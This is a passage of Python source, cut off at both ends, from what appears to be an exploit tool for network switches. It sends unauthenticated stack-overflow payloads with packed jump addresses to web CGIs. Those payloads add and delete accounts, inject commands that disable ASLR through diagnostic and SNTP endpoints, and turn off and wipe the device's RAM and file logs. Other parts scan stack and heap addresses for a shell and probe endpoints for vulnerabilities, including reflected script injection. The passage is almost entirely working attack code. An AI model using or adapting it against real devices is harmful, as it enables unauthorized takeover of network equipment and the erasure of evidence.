502:\r\n\t\t\t\t\tpass\r\n\t\t\t\telse:\r\n\t\t\t\t\tshell.failure(str(e))\r\n\t\t\t\t\tself.event.set()\r\n\t\t\t\t\tr = remote(\"127.0.0.1\",self.lport,ssl=False)\r\n\t\t\t\t\tr.close()\r\n\t\t\t\t\treturn False\r\n\r\n\t\t\tif self.event.is_set():\r\n\t\t\t\tshell.success(\"{} <= found\".format(hex(START))) # Its lovely when [stack] are rwxp :>\r\n\t\t\t\treturn True\r\n\r\n\t\t\tif self.target['exploit']['heack_cgi_shell']['stack']:\r\n\t\t\t\tSTART = START - 0x30 # Walk down from top of stack\r\n\t\t\telse:\r\n\t\t\t\tSTART = START + 0xC00 # Walk up on heap (and bigger jumps)\r\n\r\n\t\tshell.failure(\"Not found, play with start/stop addresses?\")\r\n\t\t# Little dirty but works\r\n\t\tself.event.set()\r\n\t\tr = remote(\"127.0.0.1\",self.lport,ssl=False)\r\n\t\tr.close()\r\n\t\treturn False\r\n\r\n\t#\r\n\t# Access: Unauthorized\r\n\t#\r\n\tdef stack_add_account(self, target):\r\n\t\tself.target = target\r\n\r\n\t\taccount = log.progress(\"Stack ADD Account\")\r\n\r\n\t\tif not self.target['exploit']['stack_cgi_add_account']['vulnerable']:\r\n\t\t\taccount.failure(\"Not listed as vulnerable\")\r\n\t\t\treturn False\r\n\r\n\t\tURI = self.target['exploit']['stack_cgi_add_account']['uri']\r\n\r\n\t\tlog.info(\"Credentials: {}/{}\".format(str(self.credentials.split(':')[0]),str(self.credentials.split(':')[1])))\r\n\r\n\t\tself.Workaround = self.target['exploit']['stack_cgi_add_account']['workaround']\r\n\t\tif self.Workaround:\r\n\t\t\tself.Workaround_logout()\r\n\r\n\t\ttry:\r\n\t\t\ttime.sleep(1)\r\n\t\t\tquery_args = self.target['exploit']['stack_cgi_add_account']['content']\r\n\t\t\tquery_args = query_args.replace(\"_JUMP_\", urllib.quote_plus(struct.pack('>L',self.target['exploit']['stack_cgi_add_account']['address'] + 0x58000000)) ) # 0x58 will be overwritten\r\n\t\t\tquery_args = query_args.replace(\"_CMD_\",self.target['exploit']['stack_cgi_add_account']['account'])\r\n\t\t\tquery_args = query_args.replace(\"USERNAME\",str(self.credentials.split(':')[0]))\r\n\t\t\tquery_args = query_args.replace(\"PASSWORD\",str(self.credentials.split(':')[1]))\r\n\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\tDEBUG(\"RECV\",response.read())\r\n\t\t\taccount.failure(response.code)\r\n\t\t\treturn False\r\n\r\n\t\texcept Exception as e:\r\n\t\t\tDEBUG(\"RECV\",str(e))\r\n\t\t\tif e.code == 502:\r\n\t\t\t\taccount.success(\"success\")\r\n\t\t\t\tif self.Workaround:\r\n\t\t\t\t\tself.Workaround_logout()\r\n\t\t\t\tpass\r\n\t\t\telse:\r\n\t\t\t\taccount.failure(str(e))\r\n\t\t\t\treturn False\r\n\t#\r\n\t# Access: Unauthorized\r\n\t#\r\n\tdef stack_del_account(self, target):\r\n\t\tself.target = target\r\n\r\n\t\taccount = log.progress(\"Stack DEL Account\")\r\n\r\n\t\tif not self.target['exploit']['stack_cgi_del_account']['vulnerable']:\r\n\t\t\taccount.failure(\"Not listed as vulnerable\")\r\n\t\t\treturn False\r\n\r\n\t\tURI = self.target['exploit']['stack_cgi_del_account']['uri']\r\n\r\n\t\tself.Workaround = self.target['exploit']['stack_cgi_del_account']['workaround']\r\n\t\tif self.Workaround:\r\n\t\t\tself.Workaround_logout()\r\n\r\n\t\ttry:\r\n\t\t\ttime.sleep(1)\r\n\t\t\tquery_args = self.target['exploit']['stack_cgi_del_account']['content']\r\n\t\t\tquery_args = query_args.replace(\"_JUMP_\", urllib.quote_plus(struct.pack('>L',self.target['exploit']['stack_cgi_del_account']['address'] + 0x58000000)) ) # 0x58 will be overwritten\r\n\t\t\tquery_args = query_args.replace(\"_CMD_\",self.target['exploit']['stack_cgi_del_account']['account'])\r\n\t\t\tquery_args = query_args.replace(\"USERNAME\",self.credentials.split(':')[0])\r\n\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\tDEBUG(\"RECV\",response.read())\r\n\t\t\taccount.failure(response.code)\r\n\t\t\treturn False\r\n\r\n\t\texcept Exception as e:\r\n\t\t\tDEBUG(\"RECV\",str(e))\r\n\t\t\tif e.code == 502:\r\n\t\t\t\taccount.success(\"success\")\r\n\t\t\t\tif self.Workaround:\r\n\t\t\t\t\tself.Workaround_logout()\r\n\t\t\t\tpass\r\n\t\t\telse:\r\n\t\t\t\taccount.failure(str(e))\r\n\t\t\t\treturn False\r\n\r\n\t#\r\n\t# Access: Unauthorized\r\n\t#\r\n\tdef stack_cgi_diag(self, target):\r\n\t\tself.target = target\r\n\r\n\t\tping = log.progress(\"Stack DIAG\")\r\n\r\n\t\tif not self.target['exploit']['heack_cgi_shell']['stack']:\r\n\t\t\tping.success(\"heap selected (ASLR == False)\")\r\n\t\t\treturn True\r\n\r\n\t\tif not self.target['exploit']['stack_cgi_diag']['vulnerable']:\r\n\t\t\tping.failure(\"Not listed as vulnerable\")\r\n\t\t\treturn False\r\n\r\n\t\tASLR_ENABLED = True # Always assume that ASLR is enabled, until verified\r\n\r\n\t\tURI = self.target['exploit']['stack_cgi_diag']['uri']\r\n\r\n\t\tself.Workaround = self.target['exploit']['stack_cgi_diag']['workaround']\r\n\t\tif self.Workaround:\r\n\t\t\tself.Workaround_logout()\r\n\r\n\t\ttry:\r\n\t\t\ttime.sleep(1)\r\n\t\t\t# Inject (disable ASLR)\r\n\t\t\tping.status(\"Injecting to disable\")\r\n\t\t\tquery_args = self.target['exploit']['stack_cgi_diag']['content']\r\n\t\t\tquery_args = query_args.replace(\"_JUMP_\", urllib.quote_plus(struct.pack('>L',self.target['exploit']['stack_cgi_diag']['web_sys_ping_post'] + 0x58000000)) ) # 0x58 will be overwritten\r\n\t\t\tquery_args = query_args.replace(\"_CMD_\",self.target['exploit']['stack_cgi_diag']['sys_ping_post_cmd'])\r\n\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\tDEBUG(\"RECV\",response.read())\r\n\r\n\t\t\tif self.target['exploit']['stack_cgi_diag']['sys_ping_post_SIGSEGV']:\r\n\t\t\t\tif self.Workaround:\r\n\t\t\t\t\tself.Workaround_logout()\r\n\t\t\t\tping.failure(\"Disable Injection: Failed!\")\r\n\t\t\t\treturn False\r\n\t\texcept Exception as e:\r\n\t\t\tDEBUG(\"RECV\",str(e))\r\n\t\t\tif e.code == 502:\r\n\t\t\t\tping.status(\"Done\")\r\n\t\t\t\tif self.Workaround:\r\n\t\t\t\t\tself.Workaround_logout()\r\n\t\t\t\tpass\r\n\t\t\telse:\r\n\t\t\t\tping.failure(str(e))\r\n\t\t\t\treturn False\r\n\r\n\t\tif self.target['exploit']['stack_cgi_diag']['sys_ping_post_check']:\r\n\t\t\ttry:\r\n\t\t\t\ttime.sleep(1)\r\n\t\t\t\t# Inject (check ASLR)\r\n\t\t\t\tping.status(\"Injecting to verify\")\r\n\t\t\t\tquery_args = self.target['exploit']['stack_cgi_diag']['content']\r\n\t\t\t\tquery_args = query_args.replace(\"_JUMP_\", urllib.quote_plus(struct.pack('>L',self.target['exploit']['stack_cgi_diag']['web_sys_ping_post'] + 0x58000000)) ) # 0x58 will be overwritten\r\n\t\t\t\tquery_args = query_args.replace(\"_CMD_\",self.target['exploit']['stack_cgi_diag']['sys_ping_post_check'])\r\n\t\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\t\tDEBUG(\"RECV\",response.read())\r\n\r\n\t\t\t\tif self.Workaround:\r\n\t\t\t\t\tself.Workaround_logout()\r\n\t\t\t\tping.failure(\"Verify Injection: Failed!\")\r\n\r\n\r\n\t\t\texcept Exception as e:\r\n\t\t\t\tDEBUG(\"RECV\",str(e))\r\n\t\t\t\tif e.code == 502:\r\n\t\t\t\t\ttime.sleep(1)\r\n\t\t\t\t\tping.status(\"Verifying ASLR\")\r\n\t\t\t\t\tif self.Workaround:\r\n\t\t\t\t\t\tself.Workaround_logout()\r\n\t\t\t\telse:\r\n\t\t\t\t\tping.failure(str(e))\r\n\t\t\t\t\treturn False\r\n\r\n\t\ttry:\r\n\t\t\ttime.sleep(1)\r\n\t\t\tURI = self.target['exploit']['stack_cgi_diag']['verify_uri']\r\n\t\t\tDEBUG(\"SEND\",URI)\r\n\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded\r\n\t\t\tresponse = response.read().split()\r\n\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\tif response[0] == '0':\r\n\t\t\t\tping.success(\"ASLR disabled\")\r\n\t\t\t\treturn True\r\n\t\t\telse:\r\n\t\t\t\tping.failure(\"ASLR still enabled\")\r\n\t\t\t\treturn False\r\n\t\texcept Exception as e:\r\n\t\t\tDEBUG(\"RECV\",str(e))\r\n\t\t\tif force:\r\n\t\t\t\tping.success(\"Forcing... ASLR might been disabled\")\r\n\t\t\t\treturn True\r\n\t\t\telse:\r\n\t\t\t\tping.failure(str(e))\r\n\t\t\t\tlog.failure(\"You can try with --force, some FW do not process correctly after ASLR been disabled\")\r\n\t\t\t\tlog.failure(\"or you can give --auth_shell a try instead\")\r\n\t\t\t\treturn False\r\n\r\n\t#\r\n\t# Access: Unauthorized\r\n\t#\r\n\tdef stack_cgi_sntp(self, target):\r\n\t\tself.target = target\r\n\r\n\t\tSNTP = log.progress(\"Stack SNTP\")\r\n\r\n\t\tif not self.target['exploit']['heack_cgi_shell']['stack']:\r\n\t\t\tSNTP.success(\"heap selected (ASLR == False)\")\r\n\t\t\treturn True\r\n\r\n\t\tif not self.target['exploit']['stack_cgi_sntp']['vulnerable']:\r\n\t\t\tSNTP.failure(\"Not listed as vulnerable\")\r\n\t\t\treturn False\r\n\r\n\t\tASLR_ENABLED = True\r\n\t\tURI = self.target['exploit']['stack_cgi_sntp']['uri']\r\n\r\n\t\tself.Workaround = self.target['exploit']['stack_cgi_sntp']['workaround']\r\n\t\tif self.Workaround:\r\n\t\t\tself.Workaround_logout()\r\n\r\n\t\ttry:\r\n\t\t\ttime.sleep(1)\r\n\t\t\t# Enable SNTP\r\n\t\t\tSNTP.status(\"Enable SNTP\")\r\n\t\t\tquery_args = self.target['exploit']['stack_cgi_sntp']['content']\r\n\t\t\tquery_args = query_args.replace(\"_JUMP_\", urllib.quote_plus(struct.pack('>L',self.target['exploit']['stack_cgi_sntp']['sys_timeSettings_set'] + 0x58000000)) ) # 0x58 will be overwritten\r\n\t\t\tquery_args = query_args.replace(\"_CMD_\",self.target['exploit']['stack_cgi_sntp']['sys_timeSettings_set_cmd_enable'])\r\n\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\tDEBUG(\"RECV\",response.read())\r\n\r\n\t\t\tif self.target['exploit']['stack_cgi_sntp']['sys_timeSettings_set_SIGSEGV']:\r\n\t\t\t\tSNTP.failure(\"Enable SNTP: Failed!\")\r\n\t\t\t\treturn False\r\n\r\n\t\t\tif self.Workaround:\r\n\t\t\t\tself.Workaround_logout()\r\n\r\n\t\texcept Exception as e:\r\n\t\t\tDEBUG(\"RECV\",str(e))\r\n\t\t\tif e.code == 502:\r\n\t\t\t\tSNTP.status(\"SNTP Enabled\")\r\n\t\t\t\tif self.Workaround:\r\n\t\t\t\t\tself.Workaround_logout()\r\n\t\t\t\tpass\r\n\t\t\telse:\r\n\t\t\t\tSNTP.failure(str(e))\r\n\t\t\t\treturn False\r\n\r\n\t\ttry:\r\n\t\t\ttime.sleep(1)\r\n\t\t\t# Inject SNTP (disable ASLR)\r\n\t\t\tSNTP.status(\"Injecting to disable\")\r\n\t\t\tquery_args = self.target['exploit']['stack_cgi_sntp']['content']\r\n\t\t\tquery_args = query_args.replace(\"_JUMP_\", urllib.quote_plus(struct.pack('>L',self.target['exploit']['stack_cgi_sntp']['sys_timeSntp_set'] + 0x58000000)) ) # 0x58 will be overwritten\r\n\t\t\tquery_args = query_args.replace(\"_CMD_\",self.target['exploit']['stack_cgi_sntp']['sys_timeSntp_set_cmd'])\r\n\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\tDEBUG(\"RECV\",response.read())\r\n\r\n\t\t\tif self.Workaround:\r\n\t\t\t\tself.Workaround_logout()\r\n\t\t\tSNTP.failure(\"Disable Injection: Failed!\")\r\n\t\t\treturn False\r\n\t\texcept Exception as e:\r\n\t\t\tDEBUG(\"RECV\",str(e))\r\n\t\t\tif e.code == 502:\r\n\t\t\t\tSNTP.status(\"Done\")\r\n\t\t\t\tif self.Workaround:\r\n\t\t\t\t\tself.Workaround_logout()\r\n\t\t\t\tpass\r\n\t\t\telse:\r\n\t\t\t\tSNTP.failure(str(e))\r\n\t\t\t\treturn False\r\n\r\n\t\tif self.target['exploit']['stack_cgi_sntp']['sys_timeSntp_set_check']:\r\n\t\t\ttry:\r\n\t\t\t\ttime.sleep(1)\r\n\t\t\t\t# Inject SNTP (check ASLR)\r\n\t\t\t\tSNTP.status(\"Injecting to verify\")\r\n\t\t\t\tquery_args = self.target['exploit']['stack_cgi_sntp']['content']\r\n\t\t\t\tquery_args = query_args.replace(\"_JUMP_\", urllib.quote_plus(struct.pack('>L',self.target['exploit']['stack_cgi_sntp']['sys_timeSntp_set'] + 0x58000000)) ) # 0x58 will be overwritten\r\n\t\t\t\tquery_args = query_args.replace(\"_CMD_\",self.target['exploit']['stack_cgi_sntp']['sys_timeSntp_set_check'])\r\n\t\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\t\tDEBUG(\"RECV\",response.read())\r\n\r\n\t\t\t\tif self.Workaround:\r\n\t\t\t\t\tself.Workaround_logout()\r\n\t\t\t\tSNTP.failure(\"Verify Injection: Failed!\")\r\n\t\t\t\treturn False\r\n\t\t\texcept Exception as e:\r\n\t\t\t\tDEBUG(\"RECV\",str(e))\r\n\t\t\t\tif e.code == 502:\r\n\t\t\t\t\tpass\r\n\t\t\t\telse:\r\n\t\t\t\t\tSNTP.failure(str(e))\r\n\t\t\t\t\treturn False\r\n\r\n\r\n\t\tSNTP.status(\"Verifying ASLR\")\r\n\t\tif self.Workaround:\r\n\t\t\tself.Workaround_logout()\r\n\r\n\t\ttry:\r\n\t\t\ttime.sleep(1)\r\n\t\t\tURI = self.target['exploit']['stack_cgi_sntp']['verify_uri']\r\n\t\t\tDEBUG(\"SEND\",URI)\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded\r\n\t\t\tresponse = response.read().split()\r\n\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\tif response[0] == '0':\r\n\t\t\t\tSNTP.success(\"ASLR disabled\")\r\n\t\t\t\tASLR_ENABLED = False\r\n\t\t\telse:\r\n\t\t\t\tSNTP.failure(\"ASLR Enabled\")\r\n\t\t\t\treturn False\r\n\r\n\t\texcept Exception as e:\r\n\t\t\tDEBUG(\"RECV\",str(e))\r\n\t\t\tif force:\r\n\t\t\t\tSNTP.success(\"Forcing... ASLR might been disabled\")\r\n\t\t\telse:\r\n\t\t\t\tSNTP.failure(str(e))\r\n\t\t\t\treturn False\r\n\r\n\t\ttry:\r\n\t\t\ttime.sleep(1)\r\n\t\t\t# Delete SNTP injection\r\n\t\t\tURI = self.target['exploit']['stack_cgi_sntp']['uri']\r\n\t\t\tSNTP.status(\"Removing injection\")\r\n\t\t\tquery_args = self.target['exploit']['stack_cgi_sntp']['content']\r\n\t\t\tquery_args = query_args.replace(\"_JUMP_\", urllib.quote_plus(struct.pack('>L',self.target['exploit']['stack_cgi_sntp']['sys_timeSntpDel_set'] + 0x58000000)) ) # 0x58 will be overwritten\r\n\t\t\tquery_args = query_args.replace(\"_CMD_\",self.target['exploit']['stack_cgi_sntp']['sys_timeSntpDel_set_cmd'])\r\n\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\tDEBUG(\"RECV\",response.read())\r\n\r\n\t\t\tSNTP.failure(\"Removing injection: Failed!\")\r\n\t\t\tif self.Workaround:\r\n\t\t\t\tself.Workaround_logout()\r\n\t\t\treturn False\r\n\t\texcept Exception as e:\r\n\t\t\tDEBUG(\"RECV\",str(e))\r\n\t\t\tif e.code == 502:\r\n\t\t\t\tSNTP.status(\"Done\")\r\n\t\t\t\tif self.Workaround:\r\n\t\t\t\t\tself.Workaround_logout()\r\n\t\t\t\tpass\r\n\t\t\telse:\r\n\t\t\t\tSNTP.failure(str(e))\r\n\t\t\t\treturn False\r\n\r\n\t\ttry:\r\n\t\t\ttime.sleep(1)\r\n\t\t\t# Disable SNTP\r\n\t\t\tSNTP.status(\"Disable SNTP\")\r\n\t\t\tquery_args = self.target['exploit']['stack_cgi_sntp']['content']\r\n\t\t\tquery_args = query_args.replace(\"_JUMP_\", urllib.quote_plus(struct.pack('>L',self.target['exploit']['stack_cgi_sntp']['sys_timeSettings_set'] + 0x58000000)) ) # 0x58 will be overwritten\r\n\t\t\tquery_args = query_args.replace(\"_CMD_\",self.target['exploit']['stack_cgi_sntp']['sys_timeSettings_set_cmd_disable'])\r\n\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\tDEBUG(\"RECV\",response.read())\r\n\r\n\t\t\tif self.target['exploit']['stack_cgi_sntp']['sys_timeSettings_set_SIGSEGV']:\r\n\t\t\t\tSNTP.failure(\"Disable SNTP: Failed!\")\r\n\t\t\t\treturn False\r\n\r\n\t\t\tif self.Workaround:\r\n\t\t\t\tself.Workaround_logout()\r\n\r\n\t\texcept Exception as e:\r\n\t\t\tDEBUG(\"RECV\",str(e))\r\n\t\t\tif e.code == 502:\r\n\t\t\t\tSNTP.status(\"SNTP Disabled\")\r\n\t\t\t\tif self.Workaround:\r\n\t\t\t\t\tself.Workaround_logout()\r\n\t\t\t\tpass\r\n\t\t\telse:\r\n\t\t\t\tSNTP.failure(str(e))\r\n\t\t\t\treturn False\r\n\r\n\r\n\t\tif not ASLR_ENABLED:\r\n\t\t\tSNTP.success(\"Success\")\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\tSNTP.failure(\"ASLR Enabled: Failure\")\r\n\t\t\treturn False\r\n\r\n\t#\r\n\t# Access: Unauthorized\r\n\t#\r\n\tdef stack_cgi_log(self, target):\r\n\t\tself.target = target\r\n\r\n\t\tself.Workaround = self.target['exploit']['stack_cgi_log']['workaround']\r\n\r\n\t\tif self.Workaround:\r\n\t\t\tself.Workaround_logout()\r\n\r\n\t\tURI = self.target['exploit']['stack_cgi_log']['uri']\r\n\r\n\t\tlogging = log.progress(\"Stack LOG disable & clean\")\r\n\t\tif not self.target['exploit']['stack_cgi_log']['vulnerable']:\r\n\t\t\tlogging.failure(\"No logging on this switch (?)\")\r\n\t\t\treturn True\r\n\t\ttry:\r\n\t\t\t# Disable logging\r\n\t\t\ttime.sleep(1)\r\n\t\t\tlogging.status(\"Trying to disable\")\r\n\t\t\tquery_args = self.target['exploit']['stack_cgi_log']['content']\r\n\t\t\tquery_args = query_args.replace(\"_JUMP_\", struct.pack('>L',self.target['exploit']['stack_cgi_log']['log_settings_set'] + 0x58000000) ) # 0x58 will be overwritten\r\n\t\t\tquery_args = query_args.replace(\"_CMD_\",self.target['exploit']['stack_cgi_log']['log_settings_set_cmd'])\r\n\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\tDEBUG(\"RECV\",response.read())\r\n\r\n\t\t\tif self.target['exploit']['stack_cgi_log']['log_settings_set_SIGSEGV']:\r\n\t\t\t\tlogging.failure(\"Disable: Failed!\")\r\n\t\t\t\treturn False\r\n\r\n\t\t\tif self.Workaround:\r\n\t\t\t\tself.Workaround_logout()\r\n\t\texcept Exception as e:\r\n\t\t\tDEBUG(\"RECV\",str(e))\r\n\t\t\tif e.code == 502:\r\n\t\t\t\tlogging.status(\"Disabled\")\r\n\t\t\t\tif self.Workaround:\r\n\t\t\t\t\tself.Workaround_logout()\r\n\t\t\t\tpass\r\n\t\t\telse:\r\n\t\t\t\tlogging.failure(str(e))\r\n\t\t\t\treturn False\r\n\r\n\t\ttry:\r\n\t\t\t# clean ram log\r\n\t\t\ttime.sleep(1)\r\n\t\t\tlogging.status(\"Trying to clean ramlog\")\r\n\t\t\tquery_args = self.target['exploit']['stack_cgi_log']['content']\r\n\t\t\tquery_args = query_args.replace(\"_JUMP_\", struct.pack('>L',self.target['exploit']['stack_cgi_log']['log_ramClear'] + 0x58000000) ) # 0x58 will be overwritten\r\n\t\t\tquery_args = query_args.replace(\"_CMD_\",self.target['exploit']['stack_cgi_log']['log_ramClear_cmd'])\r\n\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\tDEBUG(\"RECV\",response.read())\r\n\r\n\t\t\tif self.target['exploit']['stack_cgi_log']['log_ramClear_SIGSEGV']:\r\n\t\t\t\tlogging.failure(\"Clean RAM: Failed!\")\r\n\t\t\t\treturn False\r\n\t\t\tif self.Workaround:\r\n\t\t\t\tself.Workaround_logout()\r\n\t\t\tlogging.status(\"Cleaned\")\r\n\r\n\t\texcept Exception as e:\r\n\t\t\tDEBUG(\"RECV\",str(e))\r\n\t\t\tif e.code == 502:\r\n\t\t\t\tlogging.status(\"Cleaned\")\r\n\t\t\t\tif self.Workaround:\r\n\t\t\t\t\tself.Workaround_logout()\r\n\t\t\t\tpass\r\n\t\t\telse:\r\n\t\t\t\tlogging.failure(str(e))\r\n\t\t\t\treturn False\r\n\r\n\t\ttry:\r\n\t\t\t# clean file log\r\n\t\t\ttime.sleep(1)\r\n\t\t\tlogging.status(\"Trying to clean filelog\")\r\n\t\t\tquery_args = self.target['exploit']['stack_cgi_log']['content']\r\n\t\t\tquery_args = query_args.replace(\"_JUMP_\", struct.pack('>L',self.target['exploit']['stack_cgi_log']['log_fileClear'] + 0x58000000) ) # 0x58 will be overwritten\r\n\t\t\tquery_args = query_args.replace(\"_CMD_\",self.target['exploit']['stack_cgi_log']['log_fileClear_cmd'])\r\n\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\tDEBUG(\"RECV\",response.read())\r\n\r\n\t\t\tif self.target['exploit']['stack_cgi_log']['log_fileClear_SIGSEGV']:\r\n\t\t\t\tlogging.failure(\"Clean FILE: Failed!\")\r\n\t\t\t\treturn False\r\n\t\t\tif self.Workaround:\r\n\t\t\t\tself.Workaround_logout()\r\n\t\t\tlogging.status(\"Cleaned\")\r\n\r\n\t\texcept Exception as e:\r\n\t\t\tDEBUG(\"RECV\",str(e))\r\n\t\t\tif e.code == 502:\r\n\t\t\t\tlogging.status(\"Cleaned\")\r\n\t\t\t\tif self.Workaround:\r\n\t\t\t\t\tself.Workaround_logout()\r\n\t\t\t\tpass\r\n\t\t\telse:\r\n\t\t\t\tlogging.failure(str(e))\r\n\t\t\t\treturn False\r\n\r\n\t\tif self.Workaround:\r\n\t\t\tself.Workaround_logout()\r\n\r\n\t\tlogging.success(\"Success\")\r\n\r\n\t\treturn True\r\n\r\n\t#\r\n\t# Access: Unauthorized\r\n\t#\r\n\tdef verify_target(self,target,check_all):\r\n\t\tself.target = target\r\n\t\tself.check_all = check_all\r\n\r\n\t\tself.headers['Content-Type'] = \"multipart/form-data; boundary=-------\"\r\n\r\n\t\tself.Workaround = self.target['exploit']['heack_cgi_shell']['workaround']\r\n\r\n\t\tsorted_dict = OrderedDict(sorted(self.target['verify'].items(), key=lambda t: t[0])) # sorted by key\r\n\t\tfor check in sorted_dict:\r\n\r\n\t\t\tif self.Workaround:\r\n\t\t\t\tself.Workaround_logout()\r\n\t\t\t#\r\n\t\t\t# If we will try exploit, verify only that CGI\r\n\t\t\t#\r\n\t\t\tif not self.check_all:\r\n\t\t\t\tcheck = self.target['exploit']['heack_cgi_shell']['cgi']\r\n\r\n\t\t\tcgi = log.progress(\"{:.<30}\".format(check))\r\n\r\n\t\t\tif not len(self.target['verify'][check]['content']) == 0:\r\n\t\t\t\tif self.target['verify'][check]['Content-Type']:\r\n\t\t\t\t\tquery_args = \"Content-Type\\n\\n\" + self.target['verify'][check]['content']\r\n\t\t\t\telse:\r\n\t\t\t\t\tquery_args = self.target['verify'][check]['content']\r\n\r\n\t\t\tif not self.target['verify'][check]['safe']:\r\n\t\t\t\tcgi.success(\"Vulnerable ({})\".format(self.target['verify'][check]['content']))\r\n\t\t\t\tcontinue\r\n\r\n\t\t\tURI = self.target['verify'][check]['uri']\r\n\r\n\t\t\tif target.get('hash_uri'):\r\n\t\t\t\tURI += self.netgear_hash(URI)\r\n\r\n\t\t\ttry:\r\n\t\t\t\tif not len(self.target['verify'][check]['content']) == 0:\r\n\t\t\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\t\telse:\r\n\t\t\t\t\tDEBUG(\"SEND\",URI)\r\n\r\n\t\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded\r\n\r\n\t\t\t\tif self.target['verify'][check]['response'] == 'json':\r\n\t\t\t\t\tresult = json.loads(response.read())\r\n\t\t\t\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t\t\t\tif result['result'] == 1 and result['msg'] == \"Invalid file format.\":\r\n\t\t\t\t\t\tcgi.success(\"Vulnerable ({})\".format(result['msg']))\r\n\t\t\t\t\t\tif not self.check_all:\r\n\t\t\t\t\t\t\treturn True\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tcgi.failure(\"NOT Vulnerable\")\r\n\t\t\t\t\t\tif not self.check_all:\r\n\t\t\t\t\t\t\treturn False\r\n\r\n\t\t\t\telif self.target['verify'][check]['response'] == 'xss':\r\n\t\t\t\t\tresponse = re.split('[\"?=&<>]',response.read())\t# bummer to split out '<>''\r\n\t\t\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\t\t\tcount = 0\r\n\t\t\t\t\tfor content in range(0,len(response)):\r\n\t\t\t\t\t\tif response[content] == self.target['verify'][check]['content_check']:\r\n\t\t\t\t\t\t\tcgi.success(\"Vulnerable\")\r\n\t\t\t\t\t\t\tif not self.check_all:\r\n\t\t\t\t\t\t\t\treturn True\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t#\r\n\t\t\t\t\t\t\t# Since we split out '<>' above, make sure to count in 'script' and '/script'\r\n\t\t\t\t\t\t\t#\r\n\t\t\t\t\t\t\tif response[content] == 'alert(XSS);' and response[content-1] == 'script' and response[content+1] == '/script':\r\n\t\t\t\t\t\t\t\tcount += 1\r\n\t\t\t\t\tif count:\r\n\t\t\t\t\t\tcgi.success(\"Vulnerable (XSS: {})\".format(count))\r\n\t\t\t\t\t\tif not self.check_all:\r\n\t\t\t\t\t\t\treturn True\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tcgi.failure(\"NOT Vulnerable\")\r\n\t\t\t\t\t\tif not self.check_all:\r\n\t\t\t\t\t\t\treturn False\r\n\r\n\t\t\t\telif self.target['verify'][check]['response'] == 'html':\r\n\t\t\t\t\tresponse = re.split(\"['()<>\\n:,.&=]\",response.read())\r\n\t\t\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\t\t\tfor content in range(0,len(response)):\r\n\t\t\t\t\t\tif response[content] == self.target['verify'][check]['content_check'] or response[content] == 'Image CRC32 Error':\r\n\t\t\t\t\t\t\tcgi.success(\"Vulnerable ({})\".format(response[content]))\r\n\t\t\t\t\t\t\tif not self.check_all:\r\n\t\t\t\t\t\t\t\treturn True\r\n\t\t\t\t\t\t#\r\n\t\t\t\t\t\t# We checking what will be returned from the request\r\n\t\t\t\t\t\t# 1. The error message is correct\r\n\t\t\t\t\t\t# 2. LEN of our 'content' matching reported LEN from target\r\n\t\t\t\t\t\t#\r\n\t\t\t\t\t\telif response[content] == 'errkey':\r\n\t\t\t\t\t\t\tif response[content+1] == self.target['verify'][check]['content_check'] and int(response[content+3]) == 